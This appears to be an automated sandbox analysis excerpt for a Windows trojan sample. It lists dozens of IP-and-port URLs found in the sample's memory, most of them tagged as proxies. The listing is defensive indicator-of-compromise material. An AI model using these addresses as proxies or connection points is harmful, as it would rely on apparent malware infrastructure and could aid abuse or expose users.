                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.43.89.128:6387://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.56.150.102:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.56.150.102:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.56.150.102:3128x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5D4000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.90.50.227:55552
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://64.90.50.227:55552://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C914D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.1.244.232x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.108.9.181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.108.9.181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.108.9.181:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.152.88:8888
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.109.152.88:8888://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.18.114.254:55443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.18.114.254:55443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.20.216.249:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.20.216.249:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.131.27
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.131.27://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.131.27:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.188.18:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9138000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.188.18:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBAEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.239.89:14906
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.239.89:14906://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.255.197:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.21.255.197:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.38.21.103
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.38.21.103://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6E20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.38.21.103:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.48.236.89:8111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.48.236.89:8111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C63C5000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:24258
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:24258://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:31977
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:31977://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:40202
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:40202://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:46770
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://65.49.82.7:46770://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.135.13.125:1111
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA5E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.135.13.125:1111://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.191.31.158
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.191.31.158://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:29566
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:29566://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:36702
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:36702://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAD74000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:48487
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.33.190:48487://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:14321
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:14321://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4FF000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:23344
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA4FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:23344://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:29466
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:29466://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.35.209:46695://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:46695
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:46695://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:48487
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CADAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:48487://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:56560
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.228.37.252:56560://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.89:64672
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.248.237.89:64672://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DE0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.243:35713
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.243:35713://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.244:42560
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.244:42560://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.245:59299
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.128.245:59299://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.103:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.103:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA2F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAC09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.105:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAABD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.29.154.105:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.63.207:13802
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.42.63.207:13802://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.168.119:8000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.168.119:8000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.70.197.196:8050
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.70.197.196:8050://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.70.235.23:5454
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.70.235.23:5454://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.138
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C829F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.138://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C829F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.138:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.139
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.139://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.85.30.139:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C902F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.33.10:25283://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.59.70:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.201.59.70:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.132.249
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.132.249://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.132.249:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:32909
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:32909://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:45919
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:45919://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:62654
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:62654://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:63177
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.162.103:63177://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.190.164:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.205.190.164:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.206.213.202:55555
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.206.213.202:55555://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:65149
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.118:65149://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.168:26711
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.210.168:26711://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.49:15335
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8102000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.49:15335://proxyx
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.54:11542
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.213.212.54:11542://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C796D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C796D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.22.28.62:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.222.147.67:64879
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.222.147.67:64879://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.225.255.197:63280
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.225.255.197:63280://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C77AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:64874
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://67.227.186.83:64874://proxy
